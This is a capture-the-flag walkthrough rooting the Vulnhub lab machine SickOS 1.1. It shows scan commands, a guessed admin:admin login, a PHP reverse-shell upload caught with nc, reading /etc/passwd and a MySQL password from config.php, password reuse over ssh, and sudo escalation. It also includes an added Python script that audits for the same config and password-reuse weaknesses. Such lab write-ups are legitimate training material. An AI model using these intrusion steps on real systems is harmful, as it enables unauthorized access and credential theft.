tick.Tack

SickOS 1.1

SickOs from Vulnhub


First, scan the target with nmap

root@kali:~/_Sec/sick# nmap -sS -Pn 192.168.2.164 -p-
...
PORT     STATE  SERVICE
22/tcp   open   ssh
3128/tcp open   squid-http

Connecting to port 3128 with a browser shows that a squid proxy is running there.

Through this proxy, the browser can reach http://192.168.2.164

The home page's source is completely empty, so run nikto first to look for vulnerabilities

root@kali:~/_Sec/sick# nikto -h http://192.168.2.164 -useproxy http://192.168.2.164:3128
...
+ "robots.txt" contains 1 entry which should be manually viewed.

The scan finds a robots.txt; opening it reveals the path /wolfcms, a blog built with WolfCMS

After googling "wolfcms exploit", I found this vulnerability

But to actually use it you first have to be logged in, which brings us to the login screen.

And then!!!!!

After five minutes of guessing, I finally logged in with admin:admin

Next, test whether the PoC found earlier actually works

Upload a revershell.php, set up a listener on the attacking machine, then browse to the uploaded php file

and we have a www-data shell

root@kali:~/_Sec/sick# nc -lp 4112
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 23:58:32 up  4:11,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Checking /etc/passwd reveals a sickos account

www-data@SickOs:/$ cat /etc/passwd | grep bash
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash

Looking around sickos's home directory: .bashrc and .profile contain nothing useful, and .bash_history is not readable

Next, browse the web root /var/www; /wolfcms/config.php contains the credentials used to connect to mysql

www-data@SickOs:/var/www/wolfcms$ cat config
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');

Log into mysql with these credentials and look around; the mysql.user table turns out to hold a credential for logging in from the host sickos

www-data@SickOs:/var/www/wolfcms$ mysql -uroot -pjohn@123
...
mysql> select host,user,password from mysql.user;
select host,user,password from mysql.user;
+-----------+------------------+-------------------------------------------+
| host      | user             | password                                  |
+-----------+------------------+-------------------------------------------+
| localhost | root             | *A7A20B93EC076311A63BF86B5C705B25C054DD77 |
| sickos    | root             | *A7A20B93EC076311A63BF86B5C705B25C054DD77 |
| 127.0.0.1 | root             | *A7A20B93EC076311A63BF86B5C705B25C054DD77 |
| ::1       | root             | *A7A20B93EC076311A63BF86B5C705B25C054DD77 |
| localhost | debian-sys-maint | *CB98094782C386F2459D65D97B17D1DE15D1654B |
+-----------+------------------+-------------------------------------------+
5 rows in set (0.00 sec)

The stored passwords are hashed, but we already know the password currently used to log into mysql is john@123

With that same password, we can ssh in as the sickos account
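The pivot above rested on two things: a config.php that www-data can read with the MySQL root password in clear, and that password being reused for the sickos account. The following Python audit is an added example, not part of the original writeup: it parses a WolfCMS-style config.php, flags the exposure, and recomputes the mysql_native_password hash (the '*'-prefixed SHA1(SHA1(pw)) format seen in the mysql.user query above) to list which DB accounts still use the password from the config. The sample config and user rows are constructed, and the hashes are computed at run time rather than copied from the page.

```python
import hashlib
import os
import re
import tempfile

# Constructed sample mirroring the WolfCMS config.php found on this box.
SAMPLE_CONFIG = """<?php
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
"""
DEFINE_RE = re.compile(r"define\(\s*'([A-Z_]+)'\s*,\s*'([^']*)'\s*\)")

def parse_defines(text):
    """Return the define('KEY', 'value') pairs of a PHP config as a dict."""
    return dict(DEFINE_RE.findall(text))

def mysql_native_hash(password):
    """mysql_native_password: '*' followed by upper-case hex of SHA1(SHA1(pw))."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

def accounts_using_password(user_rows, password):
    """Accounts from (host, user, hash) mysql.user rows whose hash is that of `password`."""
    target = mysql_native_hash(password)
    return [(host, user) for host, user, stored in user_rows if stored.upper() == target]

def audit_config(path, user_rows=()):
    """Flag what let www-data pivot here: readable config, app using MySQL root, shared DB_PASS."""
    findings = []
    if os.stat(path).st_mode & 0o004:  # other-read bit set
        findings.append("config.php is world-readable")
    with open(path) as fh:
        cfg = parse_defines(fh.read())
    if cfg.get("DB_USER") == "root":
        findings.append("web app connects to MySQL as root")
    for host, user in accounts_using_password(user_rows, cfg.get("DB_PASS", "")):
        findings.append(f"mysql account '{user}'@'{host}' uses DB_PASS from config.php")
    return findings

def demo():
    """Run the audit on the constructed sample; hashes are computed here, not copied from the page."""
    with tempfile.NamedTemporaryFile("w", suffix=".php", delete=False) as tmp:
        tmp.write(SAMPLE_CONFIG)
    os.chmod(tmp.name, 0o644)  # constructed: readable by every local user
    rows = [("localhost", "root", mysql_native_hash("john@123")),
            ("localhost", "debian-sys-maint", mysql_native_hash("something-else"))]
    findings = audit_config(tmp.name, rows)
    os.unlink(tmp.name)
    return findings
```

Call `demo()` to run the audit against the constructed sample; pass a real path and rows from `select host,user,password from mysql.user` to `audit_config` to check a live install.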

www-data@SickOs:/var/www/wolfcms$ ssh sickos@192.168.2.164
ssh sickos@192.168.2.164
The authenticity of host '192.168.2.164 (192.168.2.164)' can't be established.
ECDSA key fingerprint is 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '192.168.2.164' (ECDSA) to the list of known hosts.
sickos@192.168.2.164's password: john@123

...
Last login: Fri Dec 18 22:52:51 2015 from 192.168.2.145
sickos@SickOs:~$

After logging in, .bash_history shows that sudo su has been used before

Running it gives us root, and all that's left is grabbing the flag

sickos@SickOs:~$ sudo su
sudo su
[sudo] password for sickos: john@123

root@SickOs:/home/sickos# ls -al /root
ls -al /root
total 40
drwx------  3 root root 4096 Dec  6 21:14 .
drwxr-xr-x 22 root root 4096 Sep 22 08:13 ..
-rw-r--r--  1 root root   96 Dec  6 07:27 a0216ea4d51874464078c618298b1367.txt
-rw-------  1 root root 3783 Dec 18 23:57 .bash_history
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
drwx------  2 root root 4096 Sep 22 08:33 .cache
-rw-------  1 root root   22 Dec  5 06:24 .mysql_history
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
-rw-------  1 root root 5230 Dec  6 21:14 .viminfo
root@SickOs:/home/sickos# cat /root/a0216ea4d51874464078c618298b1367.txt
cat /root/a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying


root@SickOs:/home/sickos#